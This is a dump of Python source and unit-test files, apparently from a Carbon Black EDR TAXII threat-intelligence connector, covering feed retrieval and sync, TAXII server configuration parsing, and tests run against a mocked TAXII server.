Private method to write or retrieve reports, depending on multi-core status and/or use of a feed stream.
:return: True if successful
"""
if self._config['multi_core']:
success = Value('B', False)
self._report_memory_usage("before")
process = Process(
target=self._do_write_reports if self._config['use_feed_stream'] else self._do_retrieve_reports,
kwargs={'shared_return': success})
process.start()
self.process = process
while process.is_alive():
process.join(timeout=1)
self.process = None
self._report_memory_usage("after")
return success.value
return self._do_retrieve_reports()
def perform_continuous_feed_retrieval(self, loop_forever=True) -> str:
"""
Method to poll the feeds one time or continuously (until terminated).
:param loop_forever: If True, loop until terminated
:return: feed cache, if not looping
"""
try:
self.validate_config()
# noinspection PyUnresolvedReferences
cbint.utils.filesystem.ensure_directory_exists(self._config['cache_folder'])
while True:
_logger.info("Starting feed retrieval.")
errored = True
try:
success = self._retrieve_reports()
if success:
self._sync_cb_feed()
errored = False
except Exception as e:
_logger.exception("Error occurred while attempting to retrieve feed: {0}".format(e))
gc.collect()
self.last_sync.stamp()
_logger.debug("Feed report retrieval completed{0}.".format(" (Errored)" if errored else ""))
if not loop_forever:
return self.feed_cache.read(as_text=True)
# Full sleep interval is taken between feed retrieval work.
time.sleep(self._config['feed_retrieval_minutes'] * 60)
except Exception as err:
# If an exception makes us exit then log what we can for our own sake
_logger.fatal("FEED RETRIEVAL LOOP IS EXITING! Daemon should be restarted to restore functionality!")
_logger.fatal(f"Fatal Error Encountered:\n{err}\n{traceback.format_exc()}")
sys.stderr.write("FEED RETRIEVAL LOOP IS EXITING! Daemon should be restarted to restore functionality!\n")
sys.stderr.write(f"Fatal Error Encountered:\n{err}\n{traceback.format_exc()}")
sys.exit(3)
def _sync_cb_feed(self) -> None:
"""
Private method to sync EDR feeds.
"""
if self._config['skip_cb_sync']:
return
try:
feeds = get_object_by_name_or_id(self.cb, Feed, name=self._config.FEED_NAME)
except Exception as e:
_logger.error(e)
feeds = None
if not feeds:
_logger.info(f"Feed {self._config.FEED_NAME} was not found, so we are going to create it")
f = self.cb.create(Feed)
# noinspection HttpUrlsUsage
f.feed_url = f"http://{self._config['host_address']}:{self._config['listener_port']}/taxii/json"
f.enabled = True
f.use_proxy = False
f.validate_server_cert = False
try:
f.save()
except ServerError as se:
if se.error_code == 500:
_logger.info("Could not add feed:")
_logger.info(
" Received error code 500 from server. "
"This is usually because the server cannot retrieve the feed.")
_logger.info(
" Check to ensure the Cb server has network connectivity and the credentials are correct.")
else:
_logger.info(f"Could not add feed: {str(se)}")
except Exception as e:
_logger.info(f"Could not add feed: {str(e)}")
else:
_logger.info(f"Feed data: {str(f)}")
_logger.info(f"Added feed. New feed ID is {f.id}")
f.synchronize(False)
elif feeds:
    if len(feeds) > 1:
        _logger.warning(f"Multiple feeds found, selecting first one (Feed id {feeds[0].id})")
    feed_id = feeds[0].id
    _logger.info(f"Feed {self._config.FEED_NAME} was found as Feed ID {feed_id}")
    feeds[0].synchronize(False)
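# --- Illustrative usage sketch (not part of the original module) ----------------
# A minimal, standalone demonstration of the two small helpers defined above
# (TimeStamp and log_option_value); the bridge class itself is normally driven by
# the cbint daemon machinery and a config.ini file, so it is not exercised here.
if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    last_sync = TimeStamp()            # renders as "Never" until stamped
    log_option_value("Last sync", str(last_sync))
    last_sync.stamp()                  # record the current GMT time
    log_option_value("Last sync", str(last_sync))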
```
#### File: cbopensource/driver/taxii_server_config.py
```python
import os
import re
from enum import Enum
from taxii2client.common import TokenAuth
from taxii2client.v20 import Server as ServerV20
from taxii2client.v21 import Server as ServerV21
from cbopensource.utilities.common_config import BoolConfigOption, CertConfigOption, CommaDelimitedListConfigOption, \
CommonConfigBase, CommonConfigException, CommonConfigOptionBase, IntConfigOption, PairedConfigOption, \
StringConfigOption
__all__ = ["TaxiiURLConfigOption", "ServerVersion", "ServerVersionConfigOption",
"TaxiiServerConfiguration"]
class TaxiiURLConfigOption(CommonConfigOptionBase):
@staticmethod
def taxii_url_checker(value):
matched = re.search(r"https?://\S+(:\d{1,5})?", value)
if matched is None:
raise CommonConfigException("Server url must match required format http(s)://<server>[:port]/taxii2")
def __init__(self):
super().__init__('url', str, bounds_checker=self.taxii_url_checker)
class ServerVersion(Enum):
V21 = 1
V20 = 0
@staticmethod
def get_server_for_version(version):
if version == ServerVersion.V20:
return ServerV20
else:
return ServerV21
@staticmethod
def from_string(str_version):
return ServerVersion[str_version.upper()]
@staticmethod
def check_string_version(str_version):
if str_version.upper() not in ["V20", "V21"]:
raise CommonConfigException(f"Version '{str_version.upper()}' "
f"not supported, supported versions are V21 and V20")
class ServerVersionConfigOption(CommonConfigOptionBase):
def __init__(self):
super().__init__('version', str, bounds_checker=ServerVersion.check_string_version, required=False,
transform=ServerVersion.from_string, allowed_values=[ServerVersion.V20, ServerVersion.V21])
class TaxiiServerConfiguration(CommonConfigBase):
"""
The class handles the configuration of a single TAXII connection stanza.
"""
DEFAULT_SCORE = 75
DEFAULT_PAGINATION = 100
PAGINATION_LOW_BOUNDS = 10
PAGINATION_HIGH_BOUNDS = 1000
# Schema definitions
config_schema = {
"cert": CertConfigOption(),
"collections": CommaDelimitedListConfigOption('collections', unique=True, required=False, default=None,
sort_list=False),
"ioc_types": CommaDelimitedListConfigOption('ioc_types', unique=True, required=False, default=None,
accepted_values=['hash', 'address', 'domain'], max_len=3),
"pagination": IntConfigOption('pagination', min_value=PAGINATION_LOW_BOUNDS, max_value=PAGINATION_HIGH_BOUNDS,
required=False, default=100),
"password": PairedConfigOption(StringConfigOption('password', required=False), 'username'),
"score": IntConfigOption('score', min_value=1, max_value=100, default=DEFAULT_SCORE),
"token": StringConfigOption("token", required=False, max_len=156, transform=TokenAuth),
"url": TaxiiURLConfigOption(),
"user": PairedConfigOption(StringConfigOption('username', required=False), 'password'),
"verify": BoolConfigOption('verify', required=False, default=None),
"version": ServerVersionConfigOption(),
}
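# --- Illustrative usage sketch (not part of the original module) ----------------
# The stanza below uses made-up example values; it only shows the shape of a TAXII
# server section once read from config.ini. parse() and .dict are inherited from
# CommonConfigBase and are used the same way by the connector's bridge code; the
# keys of the resulting dict follow the option names declared in config_schema.
if __name__ == "__main__":
    stanza = {
        "url": "https://taxii.example.com/taxii2",
        "username": "analyst",
        "password": "<PASSWORD>",
        "collections": "indicators, malware",
        "score": "90",
        "version": "v21",
    }
    print(TaxiiServerConfiguration.parse(stanza).dict)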
```
#### File: cb-taxii-connector/test/test_common_config.py
```python
from unittest import TestCase, mock
from cbopensource.utilities.common_config import BoolConfigOption, CertConfigOption, CommaDelimitedListConfigOption, \
CommonConfigException, IntConfigOption, PairedConfigOption, StringConfigOption
class TestConfig(TestCase):
def test_01a_boolean_valid(self):
"""
Ensure that simple BoolConfigOption works as expected.
"""
# set of tests and expected results
checks = [("True", True), ("TRUE", True), ("true", True),
("False", False), ("FALSE", False), ("false", False)
]
problems = []
for item in checks:
try:
config = {'check': item[0]}
test = BoolConfigOption("check").parse_from_dict(config)
if item[1] != test:
problems.append(f"Value `{item[0]}` did not convert to the expected `{item[1]}`")
except CommonConfigException as err:
problems.append(f"{err}")
assert len(problems) == 0, "There were problems seen:\n " + " \n".join(problems)
def test_01b_boolean_bogus(self):
"""
Ensure that bogus boolean values are caught.
"""
try:
config = {'check': "BOGUS"}
BoolConfigOption("check").parse_from_dict(config)
self.fail("Did not trap bogus value for boolean")
except CommonConfigException as err:
assert "Only case-insensitive values of 'true' or 'false'" in str(err)
def test_01c_boolean_missing(self):
"""
By default, boolean values are required.
"""
try:
config = {}
BoolConfigOption("check").parse_from_dict(config)
self.fail("Did not trap missing value for boolean")
except CommonConfigException as err:
assert "Configuration key 'check' is required" in str(err)
def test_01d_boolean_missing_not_required_default(self):
"""
Ensure that None is returned if the parameter is not supplied and no default is given.
"""
config = {}
test = BoolConfigOption("check", required=False).parse_from_dict(config)
self.assertIsNone(test)
def test_01e_boolean_missing_not_required_default_specified(self):
"""
Ensure that a specified default value is used if the parameter is not supplied.
"""
config = {}
test = BoolConfigOption("check", required=False, default=True).parse_from_dict(config)
self.assertTrue(test)
def test_02a_int(self):
"""
Ensure that simple IntConfigOption works as expected.
"""
config = {"check": "42"}
test = IntConfigOption("check").parse_from_dict(config)
self.assertEqual(test, 42)
def test_02b_int_bogus(self):
"""
Ensure that bogus int values are caught.
"""
try:
config = {'check': "BOGUS"}
IntConfigOption("check").parse_from_dict(config)
self.fail("Did not trap bogus value for int")
except CommonConfigException as err:
assert "Problem with configuration key 'check': invalid literal for int()" in str(err)
def test_02c_int_bogus_float(self):
"""
Ensure that bogus int values are caught.
"""
try:
config = {'check': "4.5"}
IntConfigOption("check").parse_from_dict(config)
self.fail("Did not trap bogus value for int")
except CommonConfigException as err:
assert "roblem with configuration key 'check': invalid literal for int()" in str(err)
def test_02d_int_missing(self):
"""
By default, int values are required.
"""
try:
config = {}
IntConfigOption("check").parse_from_dict(config)
self.fail("Did not trap missing value for int")
except CommonConfigException as err:
assert "Configuration key 'check' is required" in str(err)
def test_02e_int_missing_not_required_default(self):
"""
Ensure that None is returned if the parameter is not supplied and no default is given.
"""
config = {}
test = IntConfigOption("check", required=False).parse_from_dict(config)
self.assertIsNone(test)
def test_02f_int_missing_not_required_default_specified(self):
"""
Ensure that a specified default value is used if the parameter is not supplied.
"""
config = {}
test = IntConfigOption("check", required=False, default=42).parse_from_dict(config)
self.assertEqual(test, 42)
def test_02g_int_at_specified_min(self):
"""
Ensure that an int at the specified min is ok.
"""
config = {'check': '3'}
test = IntConfigOption("check", min_value=3).parse_from_dict(config)
self.assertEqual(test, 3)
def test_02h_int_outside_specified_min(self):
"""
Ensure that values outside the specified minimum are trapped.
"""
try:
config = {"check": "1"}
IntConfigOption("check", min_value=10).parse_from_dict(config)
self.fail("Did not trap outside value for int")
except CommonConfigException as err:
assert "'check' must be between 10 and 100" in str(err)
def test_02i_int_at_specified_max(self):
"""
Ensure that an int at the specified max is ok.
"""
config = {'check': '90'}
test = IntConfigOption("check", max_value=90).parse_from_dict(config)
self.assertEqual(test, 90)
def test_02j_int_outside_specified_max(self):
"""
Ensure that values outside the specified maximum are trapped.
"""
try:
config = {"check": "100"}
IntConfigOption("check", max_value=95).parse_from_dict(config)
self.fail("Did not trap outside value for int")
except CommonConfigException as err:
assert "'check' must be between 0 and 95 (got 100)" in str(err)
def test_03a_string(self):
"""
Ensure that simple StringConfigOption works as expected.
"""
config = {"check": "Okay"}
test = StringConfigOption("check").parse_from_dict(config)
self.assertEqual(test, "Okay")
def test_03b_string_missing(self):
"""
By default, string values are required.
"""
try:
config = {}
StringConfigOption("check").parse_from_dict(config)
self.fail("Did not trap missing value for str")
except CommonConfigException as err:
assert "Configuration key 'check' is required" in str(err)
def test_03c_string_missing_not_required_default(self):
"""
Ensure that None is returned if the parameter is not supplied and no default is given.
"""
config = {}
test = StringConfigOption("check", required=False).parse_from_dict(config)
self.assertIsNone(test)
def test_03d_string_missing_not_required_default_specified(self):
"""
Ensure that a specified default value is used if the parameter is not supplied.
"""
config = {}
test = StringConfigOption("check", required=False, default="Huh?").parse_from_dict(config)
self.assertEqual(test, "Huh?")
def test_03e_string_in_allowed_values(self):
"""
Ensure that allowed values are accepted (as is).
"""
config = {"check": "Alpha"}
test = StringConfigOption("check", allowed_values=["Alpha", "Beta", "Gamma"]).parse_from_dict(config)
self.assertEqual(test, "Alpha")
def test_03f_string_in_allowed_values_bad_case(self):
"""
Ensure that a value with the wrong case is rejected when allowed values are enforced.
"""
config = {"check": "ALPHA"}
try:
StringConfigOption("check", allowed_values=["Alpha", "Beta", "Gamma"]).parse_from_dict(config)
self.fail("Did not trap incorrect case value for str")
except CommonConfigException as err:
assert "Configuration key 'check' must be in allowed values" in str(err)
def test_03g_string_to_upper(self):
"""
Ensure that if to_upper=True, the resulting string is uppercased.
"""
config = {"check": "Alpha"}
test = StringConfigOption("check", to_upper=True).parse_from_dict(config)
self.assertEqual(test, "ALPHA")
def test_03h_string_hidden(self):
"""
Ensure that if hidden=True, the string
"""
config = {"check": "Alpha"}
test = StringConfigOption("check", to_upper=True).parse_from_dict(config)
self.assertEqual(test, "ALPHA")
def test_03i_string_at_min_size(self):
"""
Ensure that strings at a noted minimum size are ok
"""
config = {"check": "Alpha"}
test = StringConfigOption("check", min_len=5).parse_from_dict(config)
self.assertEqual(test, "Alpha")
def test_03j_string_below_minimum_size(self):
"""
Ensure that StringConfigOption below minimum size is trapped.
"""
config = {"check": "Alpha"}
try:
StringConfigOption("check", min_len=10).parse_from_dict(config)
self.fail("Did not trap size check")
except CommonConfigException as err:
assert "'check' - String length 5 does not meet minimum length of 10" in str(err)
def test_03k_string_at_maximum_size(self):
"""
Ensure that strings at a noted maximum size are ok
"""
config = {"check": "Alpha"}
test = StringConfigOption("check", max_len=5).parse_from_dict(config)
self.assertEqual(test, "Alpha")
def test_03l_string_above_maximum_size(self):
"""
Ensure that StringConfigOption above maximum size is trapped.
"""
config = {"check": "Alpha"}
try:
StringConfigOption("check", max_len=3).parse_from_dict(config)
self.fail("Did not trap size check")
except CommonConfigException as err:
assert "'check' - String length 5 exceeds maxmimum length of 3" in str(err)
def test_03m_string__max_and_min_specified_too_small(self):
"""
Ensure that StringConfigOption outside size scope maximum size is trapped and proper message returned
when both max and min are specified
"""
config = {"check": "Alpha"}
try:
StringConfigOption("check", min_len=6, max_len=10).parse_from_dict(config)
self.fail("Did not trap size check")
except CommonConfigException as err:
assert "'check' - String length 5 not in bounds 6 -> 10" in str(err)
def test_03n_string__max_and_min_specified_too_large(self):
"""
Ensure that StringConfigOption outside size scope maximum size is trapped and proper message returned
when both max and min are specified
"""
config = {"check": "Alpha"}
try:
StringConfigOption("check", min_len=1, max_len=3).parse_from_dict(config)
self.fail("Did not trap size check")
except CommonConfigException as err:
assert "'check' - String length 5 not in bounds 1 -> 3" in str(err)
def test_04a_paired(self):
"""
Ensure that PairedConfigOption works as expected with no problems.
"""
config = {"user": "alpha", "pass": "<PASSWORD>"}
check = PairedConfigOption(StringConfigOption('user', required=False), 'pass').parse_from_dict(config)
self.assertEqual(check, "alpha")
def test_04b_paired_missing_requirement(self):
"""
Ensure that PairedConfigOption traps problems when a requirement is missing.
"""
config = {"user": "alpha"}
try:
PairedConfigOption(StringConfigOption('user', required=False), 'pass').parse_from_dict(config)
self.fail("Did not trap missing requirement")
except CommonConfigException as err:
assert "'pass' is required when 'user' is specified" in str(err)
def test_04c_paired_requirement_empty_string(self):
"""
Ensure that PairedConfigOption works as expected with no problems if the requirement is specified with an
empty string (it has been defined)
"""
config = {"user": "alpha", "pass": ""}
check = PairedConfigOption(StringConfigOption('user', required=False), 'pass').parse_from_dict(config)
self.assertEqual(check, "alpha")
def test_04d_paired_requirement_empty_string_with_required_primary(self):
"""
Ensure that PairedConfigOption works as expected with no problems if the requirement is specified with an
empty string (it has been defined)
"""
config = {"user": "alpha", "pass": ""}
check = PairedConfigOption(StringConfigOption('user', required=True), 'pass').parse_from_dict(config)
self.assertEqual(check, "alpha")
def test_04e_paired_requirement_empty_string_with_required_primary(self):
"""
Ensure that PairedConfigOption returns None when the primary option is absent,
even though the paired requirement is present.
"""
config = {"pass": "beta"}
check = PairedConfigOption(StringConfigOption('user', required=False), 'pass').parse_from_dict(config)
self.assertIsNone(check)
def test_05a_comma_delimited(self):
"""
Ensure that CommaDelimitedListConfigOption works as expected.
"""
config = {"check": "alpha, beta, gamma, delta"}
test = CommaDelimitedListConfigOption("check").parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'delta', 'gamma'])
def test_05b_comma_delimited_no_sort(self):
"""
Ensure that CommaDelimitedListConfigOption works as expected with sorting disabled.
"""
config = {"check": "alpha, beta, gamma, delta"}
test = CommaDelimitedListConfigOption("check", sort_list=False).parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma', 'delta'])
def test_05c_comma_delimited_list_minimum_size(self):
"""
Ensure that CommaDelimitedListConfigOption minimum size is ok.
"""
config = {"check": "alpha, beta, gamma"}
test = CommaDelimitedListConfigOption("check", min_len=3).parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma'])
def test_05d_comma_delimited_list_below_minimum_size(self):
"""
Ensure that CommaDelimitedListConfigOption below minimum size is trapped.
"""
config = {"check": "alpha, beta, gamma"}
try:
CommaDelimitedListConfigOption("check", min_len=4).parse_from_dict(config)
self.fail("Did not trap list below minimum size")
except CommonConfigException as err:
assert "'check' - List length 3 does not meet minimum length of 4" in str(err)
def test_05e_comma_delimited_list_maximum_size(self):
"""
Ensure that CommaDelimitedListConfigOption maximum size is ok.
"""
config = {"check": "alpha, beta, gamma"}
test = CommaDelimitedListConfigOption("check", max_len=3).parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma'])
def test_05f_comma_delimited_list_above_maximum_size(self):
"""
Ensure that CommaDelimitedListConfigOption over maximum size is trapped.
"""
config = {"check": "alpha, beta, gamma"}
try:
CommaDelimitedListConfigOption("check", max_len=2).parse_from_dict(config)
self.fail("Did not trap list above maximum size")
except CommonConfigException as err:
assert "'check' - List length 3 exceeds maxmimum length of 2" in str(err)
def test_05f_comma_delimited_max_and_min_specified_too_small(self):
"""
Ensure that CommaDelimitedListConfigOption under minimum size is trapped, and proper message when
both sizes are specified.
"""
config = {"check": "alpha, beta, gamma, delta, eta"}
try:
CommaDelimitedListConfigOption("check", min_len=10, max_len=40).parse_from_dict(config)
self.fail("Did not trap list below minimum size")
except CommonConfigException as err:
assert "'check' - List length 5 not in bounds 10 -> 40" in str(err)
def test_05g_comma_delimited_max_and_min_specified_too_large(self):
"""
Ensure that CommaDelimitedListConfigOption over maximum size is trapped, and proper message when
both sizes are specified.
"""
config = {"check": "alpha, beta, gamma, delta, eta"}
try:
CommaDelimitedListConfigOption("check", min_len=1, max_len=3).parse_from_dict(config)
self.fail("Did not trap list above maximum size")
except CommonConfigException as err:
assert "'check' - List length 5 not in bounds 1 -> 3" in str(err)
def test_05h_comma_delimited_list_accepted_values(self):
"""
Ensure that CommaDelimitedListConfigOption accepted values work.
"""
accepted = ['alpha', 'beta', 'gamma', 'delta']
config = {"check": "alpha, beta, gamma"}
test = CommaDelimitedListConfigOption("check", accepted_values=accepted).parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma'])
def test_05i_comma_delimited_list_accepted_values_bad_value(self):
"""
Ensure that CommaDelimitedListConfigOption over maximum size is trapped, and proper message when
both sizes are specified.
"""
accepted = ['alpha', 'beta', 'gamma', 'delta']
config = {"check": "alpha, beta, foobar"}
try:
CommaDelimitedListConfigOption("check", accepted_values=accepted).parse_from_dict(config)
self.fail("Did not trap bad entry")
except CommonConfigException as err:
assert "'check' - Acceptable values (case insensitive) are: ['alpha', 'beta', 'delta', 'gamma']" in str(err)
def test_05i_comma_delimited_validate_trim(self):
"""
Ensure that CommaDelimitedListConfigOption string entries are trimmed.
"""
config = {"check": " alpha, beta ,gamma "}
test = CommaDelimitedListConfigOption("check").parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma'])
def test_05j_comma_delimited_to_upper(self):
"""
Ensure that CommaDelimitedListConfigOption with to_upper are properly uppercased.
"""
config = {"check": "alpha, beta, gamma"}
test = CommaDelimitedListConfigOption("check", to_upper=True).parse_from_dict(config)
self.assertListEqual(test, ['ALPHA', 'BETA', 'GAMMA'])
def test_05k_comma_delimited_list_unique(self):
"""
Ensure that CommaDelimitedListConfigOption unique setting is allowed.
"""
config = {"check": "alpha, beta, gamma"}
test = CommaDelimitedListConfigOption("check", unique=True).parse_from_dict(config)
self.assertListEqual(test, ['alpha', 'beta', 'gamma'])
def test_05l_comma_delimited_list_unique_with_duplicates(self):
"""
Ensure that CommaDelimitedListConfigOption with unique specified catches duplicates.
"""
config = {"check": "alpha, beta, alpha"}
try:
CommaDelimitedListConfigOption("check", unique=True).parse_from_dict(config)
self.fail("Did not trap bad entry")
except CommonConfigException as err:
assert "'check' - List entries must be unique" in str(err)
def test_06a_cert_unspecified(self):
"""
Ensure that CertConfigOption allows unspecified values.
"""
config = {}
test = CertConfigOption().parse_from_dict(config)
self.assertIsNone(test)
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_06b_cert_only_cert_path_default_key(self, os_path_exists):
"""
Ensure that CertConfigOption with single source returns cert path.
"""
os_path_exists.return_value = True
config = {"cert": "/path/to/cert.pem"}
test = CertConfigOption().parse_from_dict(config)
self.assertEqual(test, "/path/to/cert.pem")
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_06c_cert_only_cert_path_specified_key(self, os_path_exists):
"""
Ensure that CertConfigOption with single source returns cert path.
"""
os_path_exists.return_value = True
config = {"my-cert": "/path/to/cert.pem"}
test = CertConfigOption("my-cert").parse_from_dict(config)
self.assertEqual(test, "/path/to/cert.pem")
@mock.patch("os.path.exists")
def test_06d_cert_only_cert_path_not_exists(self, os_path_exists_mock):
"""
Ensure that CertConfigOption with single source returns cert path.
"""
config = {"cert": "./does-not-exist.pem"}
os_path_exists_mock.return_value = False
try:
CertConfigOption().parse_from_dict(config)
self.fail("Did not trap missing cert")
except CommonConfigException as err:
assert "'cert' path to cert+key pair does not exist" in str(err)
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_06e_cert_both_paths_specified(self, os_path_exists):
"""
Ensure that CertConfigOption with multiple source returns cert and key path.
"""
os_path_exists.return_value = True
config = {"cert": "/path/to/cert.pem, /path/to/key.pem"}
test = CertConfigOption("cert").parse_from_dict(config)
self.assertTupleEqual(test, ("/path/to/cert.pem", "/path/to/key.pem"))
@mock.patch("os.path.exists")
def test_06f_cert_both_paths_specified_cert_missing(self, os_path_exists_mock):
"""
Ensure that CertConfigOption with both sources traps missing cert.
"""
config = {"cert": f"./does_not_exist.py, {__file__}"}
os_path_exists_mock.return_value = False
try:
CertConfigOption().parse_from_dict(config)
self.fail("Did not trap missing cert")
except CommonConfigException as err:
assert "'cert' cert path './does_not_exist.py' does not exist!" in str(err)
@mock.patch("os.path.exists")
def test_06g_cert_both_paths_specified_key_missing(self, os_path_exists_mock):
"""
Ensure that CertConfigOption with both sources traps missing key.
"""
os_path_exists_mock.side_effect = [True, False]
config = {"cert": f"{__file__}, ./does_not_exist.py"}
try:
CertConfigOption().parse_from_dict(config)
self.fail("Did not trap missing key")
except CommonConfigException as err:
assert "'cert' key path './does_not_exist.py' does not exist!" in str(err)
def test_06h_cert_empty_string(self):
"""
Ensure that CertConfigOption with empty string is detected.
"""
config = {"cert": ""}
try:
CertConfigOption().parse_from_dict(config)
self.fail("Did not trap missing cert")
except CommonConfigException as err:
assert "'cert' must be specified as the path to a .pem encoded" in str(err)
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_06i_cert_three_entries(self, os_path_exists):
"""
Ensure that CertConfigOption rejects a value with three entries.
"""
os_path_exists.return_value = True
config = {"cert": "/path/to/cert.pem, /path/to/key.pem, /path/to/cert.pem"}
try:
CertConfigOption().parse_from_dict(config)
self.fail("Did not trap invalid cert specification")
except CommonConfigException as err:
assert "'cert' must be specified as the path to a .pem encoded" in str(err)
```
#### File: cb-taxii-connector/test/test_driver.py
```python
import os
import re
import unittest
from unittest import mock
from urllib.parse import urlparse
import requests_mock
from medallion import MEDIA_TYPE_TAXII_V21
from medallion.backends.memory_backend import MemoryBackend
from cbopensource.driver.taxii import TaxiiDriver
from cbopensource.driver.taxii_server_config import TaxiiServerConfiguration
class MockTaxiiServer(MemoryBackend):
def __init__(self):
super().__init__(filename=f"{os.path.dirname(os.path.abspath(__file__))}/utils/mock_taxii_data.json")
@staticmethod
def process_path_to_parts(request):
path = urlparse(request.url).path
split_path = path.strip("/").split("/")
api_root = split_path[0].strip("/")
if len(split_path) >= 3:
collection_id = split_path[2].strip("/")
return api_root, collection_id
return api_root
@staticmethod
def set_content_type(context):
context.headers['Content-Type'] = MEDIA_TYPE_TAXII_V21
def handle_discovery(self, request, context):
self.set_content_type(context)
discovery_info = self._get("/discovery")
print(f"DISCOVERY IS {discovery_info}")
return discovery_info
def handle_get_api_root(self, request, context):
self.set_content_type(context)
api_root = MockTaxiiServer.process_path_to_parts(request)
return self.get_api_root_information(api_root)
def handle_get_api_root_collections(self, request, context):
self.set_content_type(context)
api_root = MockTaxiiServer.process_path_to_parts(request)
return self.get_collections(api_root)
def handle_get_api_root_collection(self, request, context):
self.set_content_type(context)
api_root, collection_id = MockTaxiiServer.process_path_to_parts(request)
return self.get_collection(api_root, collection_id=collection_id)
def handle_get_api_root_collections_objects(self, request, context):
self.set_content_type(context)
api_root, collection_id = MockTaxiiServer.process_path_to_parts(request)
limit = int(request.qs.get("limit", ['100'])[0])
request_args_as_dict = {arg: request.qs[arg][0] for arg in request.qs if arg != 'limit'}
objects, headers = self.get_objects(
api_root, collection_id, request_args_as_dict, ("id", "type", "version", "spec_version"), limit
)
context.headers.update(headers)
return objects
class _TestDriverMockedServer(unittest.TestCase):
default_settings = [{"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}]
match_api_root = re.compile(r"^/\S+/$")
match_api_root_collections = re.compile(r"/\S+/collections/$")
match_api_root_collection_objects = re.compile(r"/\S+/collections/\S+/objects/")
def make_driver(self, settings=None):
if not settings:
settings = _TestDriverMockedServer.default_settings
parsed_settings = [TaxiiServerConfiguration.parse(server_settings).dict for server_settings in settings]
return TaxiiDriver(servers=parsed_settings)
def run(self, result=None):
with requests_mock.Mocker() as mocker:
mock_server = MockTaxiiServer()
mocker.get("/taxii2/", json=mock_server.handle_discovery)
mocker.get(self.match_api_root, json=mock_server.handle_get_api_root)
mocker.get(self.match_api_root_collections, json=mock_server.handle_get_api_root_collections)
mocker.get(self.match_api_root_collection_objects, json=mock_server.handle_get_api_root_collections_objects)
super(_TestDriverMockedServer, self).run(result)
def test_verify_connection(self):
driver = self.make_driver()
driver.test_connections()
def test_get_collections(self):
driver = self.make_driver()
assert len(driver.collections) > 0
def test_get_collections_constrained(self):
settings = [{"collections": "91a7b528-80eb-42ed-a74d-c6fbd5a26116", "url": "http://localhost:5000/taxii2",
"username": "user", "password": "<PASSWORD>"}]
driver = self.make_driver(settings)
assert len(driver.collections) == 1
def test_get_indicators(self):
driver = self.make_driver()
for collection in driver.collections:
for indicator in collection.stream_indicators():
assert indicator
def test_get_reports(self):
driver = self.make_driver()
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert report['score'] == TaxiiServerConfiguration.DEFAULT_SCORE
assert 'iocs' in report
assert 'link' in report
assert 'id' in report
def test_get_reports_score_set(self):
scored_settings = [
{"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>", "score": '100'}]
driver = self.make_driver(scored_settings)
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert report['score'] == 100
assert 'iocs' in report
assert 'link' in report
assert 'id' in report
def test_get_reports_constrained_iocs_hashes(self):
settings = [
{"ioc_types": "hash", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}]
driver = self.make_driver(settings)
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert 'iocs' in report
assert 'md5' in report['iocs'] or 'sha256' in report['iocs']
assert 'dns' not in report['iocs']
assert 'ipv4' not in report['iocs']
assert 'ipv6' not in report['iocs']
assert 'link' in report
assert 'id' in report
def test_get_reports_constrained_iocs_addresses(self):
settings = [
{"ioc_types": "address", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}]
driver = self.make_driver(settings)
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert 'iocs' in report
assert 'ipv4' in report['iocs'] or 'ipv6' in report['iocs']
assert 'dns' not in report['iocs']
assert 'md5' not in report['iocs']
assert 'sha256' not in report['iocs']
assert 'link' in report
assert 'id' in report
def test_get_reports_constrained_iocs_domain(self):
settings = [
{"ioc_types": "domain", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}]
driver = self.make_driver(settings)
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert 'iocs' in report
assert 'ipv4' not in report['iocs']
assert 'ipv6' not in report['iocs']
assert 'dns' in report['iocs']
assert 'md5' not in report['iocs']
assert 'sha256' not in report['iocs']
assert 'link' in report
assert 'id' in report
def test_get_reports_constrained_iocs_domain_and_address(self):
settings = [
{"ioc_types": "domain,address", "url": "http://localhost:5000/taxii2", "username": "user",
"password": "<PASSWORD>"}]
driver = self.make_driver(settings)
reports = list(driver.generate_reports())
assert len(reports) > 0
for report in reports:
assert report is not None
assert 'title' in report
assert 'score' in report
assert 'iocs' in report
assert 'ipv4' in report['iocs'] or 'ipv6' in report['iocs'] or 'dns' in report['iocs']
assert 'md5' not in report['iocs']
assert 'sha256' not in report['iocs']
assert 'link' in report
assert 'id' in report
@mock.patch("cbopensource.driver.taxii.TaxiiServer.verify_connected")
@mock.patch("taxii2client.common._HTTPConnection")
@mock.patch("os.path.exists")
def test_multiple_servers(self, path_exists_mock, http_connection_mock, verify_connected):
path_exists_mock.return_value = True
settings = [{"url": "http://localhost:5000/taxii2"}, {"url": "http://localhost:5000/taxii2"}]
self.make_driver(settings)
assert len(http_connection_mock.mock_calls) == 2
"""
def test_anomali_server(self):
settings = [{"url": "https://limo.anomali.com/api/v1/taxii2/taxii/", "version": "V20", "username":"guest", "password":"<PASSWORD>"}]
driver = self.make_driver(settings)
reports = driver.generate_reports()
assert len(list(reports)) > 0"""
@mock.patch("cbopensource.driver.taxii.TaxiiServer.verify_connected")
